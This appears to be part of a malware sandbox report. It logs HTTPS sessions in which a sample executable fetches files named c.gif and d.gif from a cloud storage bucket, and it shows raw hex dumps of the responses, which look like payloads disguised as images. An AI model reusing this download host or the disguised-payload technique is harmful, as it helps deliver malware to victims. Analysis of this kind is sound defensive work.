2025-01-01 07:30:38 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-01 07:30:38 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:40 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:40 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:40 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 6774EF201253C53237638A6A Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Tue, 31 Dec 2024 10:00:05 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 3
2025-01-01 07:30:40 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:30:40 UTC	4096	IN	Data Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39 Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
2025-01-01 07:30:40 UTC	3034	IN	Data Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:41 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:42 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:42 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 6774EF22A645AE3636EB222C Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Tue, 31 Dec 2024 10:00:17 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 3
2025-01-01 07:30:42 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|o
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11 Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79 Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
2025-01-01 07:30:42 UTC	4096	IN	Data Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 